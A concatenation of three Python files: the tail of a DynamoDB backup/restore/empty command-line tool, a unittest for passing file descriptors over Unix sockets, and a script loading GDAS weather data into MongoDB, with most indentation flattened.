dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
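# Hedged worked examples for change_prefix(), derived by reading the code above
# (the table names are made up and nothing in the script asserts these):
def _change_prefix_examples():
    # separator mode: swap everything before the first separator
    assert change_prefix("prod-users", "prod*", "staging*", "-") == "staging-users"
    # no-separator mode: the prefix ends at the first CamelCase boundary
    assert change_prefix("prodUsers", "prod*", "staging*", "") == "stagingUsers"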
def delete_table(conn: DynamodbClient, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
                             conn.describe_table(TableName=table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
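# Hedged sketch of the payload shape batch_write() expects: a list of DynamoDB
# PutRequest wrappers, at most MAX_BATCH_WRITE per call, mirroring how do_restore()
# builds them further below. The helper name is hypothetical.
def _as_put_requests(items):
    return [{"PutRequest": {"Item": item}} for item in items]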
def wait_for_active_table(conn, table_name, verb):
"""
    Wait for table to be in the desired state
"""
while True:
if conn.describe_table(TableName=table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(TableName=table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
            conn.update_table(TableName=table_name,
                              ProvisionedThroughput={"ReadCapacityUnits": int(read_capacity),
                                                     "WriteCapacityUnits": int(write_capacity)})
break
        except conn.exceptions.LimitExceededException:
            logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo: DynamodbClient, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args['LocalSecondaryIndexes'] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args['GlobalSecondaryIndexes'] = table_global_secondary_indexes
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args['ExclusiveStartKey'] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name,
**optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
del scanned_table['ResponseMetadata']
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
def do_restore(dynamo: DynamodbClient, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args['LocalSecondaryIndexes'] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args['GlobalSecondaryIndexes'] = table_global_secondary_indexes
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(TableName=destination_table,
                                        GlobalSecondaryIndexUpdates=gsi_data)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn: DynamodbClient = _get_aws_client(
service='dynamodb',
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn: DynamodbClient = _get_aws_client(
service='dynamodb',
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn: DynamodbClient = _get_aws_client(
service='dynamodb',
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
            # Use Boto3 to find tags. Boto3 provides a paginator that makes searching tags easier.
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
kwargs={"tableQueue": q})
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(
conn=conn,
sleep_interval=sleep_interval,
table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
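# Hedged usage sketch (the script filename and the table/bucket values below are
# illustrative only; the flags are the ones defined in main() above):
#   python dynamodump.py -m backup  -r us-east-1 -s "prod*" -a tar -b my-backup-bucket
#   python dynamodump.py -m restore -r us-east-1 -s prod-users -d staging-users
#   python dynamodump.py -m empty   -r us-east-1 -s prod-sessions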
|
ancillary.py
|
from filedes.test.base import BaseFDTestCase
from filedes.socket.unix import make_unix_stream_socket, connect_unix_stream_socket
from filedes import FD
import unittest2
import _ancillary
import os
import warnings
import time
import threading
import multiprocessing
class TestAncillary(BaseFDTestCase):
def tempnam(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
return os.tempnam(None, 'uxs')
def fdTestCommon(self, send_f, recv_f):
SN = self.tempnam()
def worker():
pid = os.getpid()
while True:
try:
f1 = connect_unix_stream_socket(SN)
break
except:
time.sleep(0.05)
r, w = recv_f(f1, 2)
os.write(w, "OK:%d" % pid)
os.close(r)
os.close(w)
def acceptor(r, w):
f0 = make_unix_stream_socket(SN)
f0.listen(1024)
# Accept a single connection, then we're done
conn, address = f0.accept()
send_f(conn, [r, w])
p1 = multiprocessing.Process(target=worker)
p1.start()
r, w = os.pipe()
t = threading.Thread(target=acceptor, args=(r, w))
t.setDaemon(True)
t.start()
msg = os.read(r, 1024)
msg, pid = msg.split(":")
self.assertEquals(msg, "OK")
self.assertEquals(int(pid), p1.pid)
self.assertNotEquals(int(pid), os.getpid())
os.close(r)
os.close(w)
p1.join()
self.assertEquals(p1.exitcode, 0)
t.join()
def testAncillarySendRecvFDs(self):
def send(sock, fds):
_ancillary.send_fds(sock.fileno(), fds)
def recv(sock, n_fds):
return _ancillary.recv_fds(sock.fileno(), n_fds)
self.fdTestCommon(send, recv)
def testAncillarySendRecvFD(self):
def send(sock, fds):
for fd in fds:
_ancillary.send_fd(sock.fileno(), fd)
def recv(sock, n_fds):
result = []
for i in xrange(n_fds):
result.append(_ancillary.recv_fd(sock.fileno()))
return result
self.fdTestCommon(send, recv)
def testFiledesSocketSendRecvFDs(self):
def send(sock, fds):
FD(sock).socket.send_fds(fds)
def recv(sock, n_fds):
return FD(sock).socket.recv_fds(n_fds)
self.fdTestCommon(send, recv)
def testFiledesSocketSendRecvFD(self):
def send(sock, fds):
for fd in fds:
FD(sock).socket.send_fd(fd)
def recv(sock, n_fds):
result = []
for i in xrange(n_fds):
result.append(FD(sock).socket.recv_fd())
return result
self.fdTestCommon(send, recv)
if __name__ == '__main__':
unittest2.main()
|
load_db.py
|
import src.mongoDBI as mongoDBI
import os
import src.constants as constants
import src.utils as utils
import glob
import src.parse_grb_files as parse_grb_files
from multiprocessing import Process
from datetime import datetime, timedelta, date
# ---------------------------------------------------------------#
class buffer:
buffer = None
max_buffer_count = 25
dbi = None
def __init__(self, db_name):
self.dbi = mongoDBI.mongoDBI(db_name)
self.buffer = { }
for t in constants.mongo_db_tables:
self.buffer[t] = []
def insert_to_buffer(self, table, dict):
self.buffer[table].append(dict)
return;
def write_buffer(self):
cur_len = len(self.buffer[constants.mongo_db_tables[0]])
if cur_len < self.max_buffer_count:
return;
self.dbi.insert_bulk(self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[t] = []
return;
# data_map : dictionary
# 1st entry is the date or year_week id
def insert_to_db(self, data_map, label=constants.label_date):
if data_map is None or len(data_map) == 0:
return;
id = data_map[label]
data_map.pop(label, None)
for table, data in data_map.iteritems():
# print 'in insert to db... table:'+table
key_label = label
key_contents = id
value_label = constants.label_value
value_contents = data
dict = mongoDBI.mongoDBI.get_insert_dict(key_label, key_contents, value_label, value_contents)
self.insert_to_buffer(table, dict)
self.write_buffer()
return;
def flush(self):
self.dbi.insert_bulk(self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[t] = []
return;
# ------------------------ END OF CLASS ------------------------#
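# Hedged usage sketch for the buffer class above. The data_map shape is assumed from
# insert_to_db(): one id stored under the label key plus one entry per table listed in
# constants.mongo_db_tables. The function name is illustrative only.
def _example_buffer_usage(daily_data_map):
    b = buffer(constants.db_name_date_mean)
    b.insert_to_db(daily_data_map, label=constants.label_date)
    b.flush()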
# ---------------------------------------------------------------#
# AUXILIARY FUNCTIONS
# ---------------------------------------------------------------#
#
# Input : year
# Function :
# Inserts into db, data for each date, daily mean
#
def process_year_by_date_mean(year):
# print 'Processing year : ' + str(year)
cur_day = utils.get_current_day()
cur_year = utils.get_current_year()
buffer_obj = buffer(constants.db_name_date_mean)
dir = str(year)
if not os.path.exists(dir):
return;
os.chdir(dir)
start_day = constants.gdas_min_day
if year == cur_year:
end_day = cur_day
else:
end_day = constants.gdas_max_day
# Process the files for a single day
for day in range(start_day, end_day + 1):
dir = str(day).zfill(3)
if not os.path.exists(dir):
continue;
try:
os.chdir(dir)
files = glob.glob("gdas*z")
data = parse_grb_files.parse_files_by_date_mean(files)
buffer_obj.insert_to_db(data, label=constants.label_date)
os.chdir("../")
except:
pass
os.chdir("../")
os.chdir("../")
buffer_obj.flush()
#
# Process complete data (4 per day) of each date, of the given year
#
def process_year_by_date_complete(year):
cur_day = utils.get_current_day()
cur_year = utils.get_current_year()
buffer_obj = buffer(constants.db_name_date_complete)
dir = str(year)
if not os.path.exists(dir):
return;
os.chdir(dir)
start_day = constants.gdas_min_day
if year == cur_year:
end_day = cur_day
else:
end_day = constants.gdas_max_day
# Process the files for a single day
for day in range(start_day, end_day + 1):
dir = str(day).zfill(3)
if not os.path.exists(dir):
continue;
try:
os.chdir(dir)
files = glob.glob("gdas*z") # get list of data
data = parse_grb_files.parse_files_by_date_complete(files)
for data_element in data:
buffer_obj.insert_to_db(data_element, label=constants.label_date_idx)
os.chdir("../")
except:
pass
os.chdir("../")
os.chdir("../")
buffer_obj.flush()
# ------------------------------------------------------------------#
#
# load data by mean of a day
# all years
#
def load_all_years_by_date_mean( ):
cur_year = utils.get_current_year()
os.chdir(constants.data_dir)
os.chdir(constants.gdas_data_dir)
years = range(constants.gdas_start_year, cur_year + 1)
process_pool = []
for year in years:
p = Process(target=process_year_by_date_mean, args=(year,))
process_pool.append(p);
for p in process_pool:
p.start()
for p in process_pool:
p.join()
return;
# ------------------------------------------------------------------#
#
# load into db by a single date
# date string format must be : yyyy-mm-dd
#
def load_by_one_date(date_str):
os.chdir(constants.data_dir)
os.chdir(constants.gdas_data_dir)
format = '%Y-%m-%d'
tmp = datetime.strptime(date_str, format)
today = datetime.now()
# check if date is in future, if so return
if today < tmp:
        print 'Date given is in future!!!'
return;
    buffer_obj = buffer(constants.db_name_date_mean)  # buffer() requires a db name; the daily-mean DB is assumed here
day = tmp.timetuple().tm_yday
year = tmp.year
dir = str(year)
os.chdir(dir)
dir = str(day).zfill(3)
os.chdir(dir)
files = glob.glob("gdas*z")
data = parse_grb_files.parse_files(files)
buffer_obj.insert_to_db(data, label=constants.label_date)
buffer_obj.flush()
os.chdir("../")
os.chdir("../")
return
# ---------------------------------------------------------------#
#
# Load into db aggregate data of 7 days
# start_date : Gregorian date ,start. Type : Datetime Object
# end_date : Gregorian date ,end . Type : Datetime Object
# week_number : ISO week number , refer ISO calendar. Type : int
# year : ISO year , refer ISO calendar. Type : int
# DB : Weather_week_mean
#
def load_by_week_mean(start_date, iso_year, iso_week):
today = datetime.now()
format = '%Y-%m-%d'
start_date = datetime.strptime(start_date, format)
# check if date is in future, if so return
if today < start_date:
# DEBUG
# print 'Date given is in future!!!'
return;
file_path_dict = { }
for weekday in range(0, 7, 1):
cur = start_date + timedelta(days=weekday)
if cur > today:
break;
day = cur.timetuple().tm_yday
year = cur.year
yr_dir = str(year)
try:
os.chdir(yr_dir)
day_dir = str(day).zfill(3)
try:
os.chdir(day_dir)
files = glob.glob("gdas*z")
path = yr_dir + '/' + day_dir + '/.'
file_path_dict[path] = files
os.chdir("../")
except:
pass
os.chdir("../")
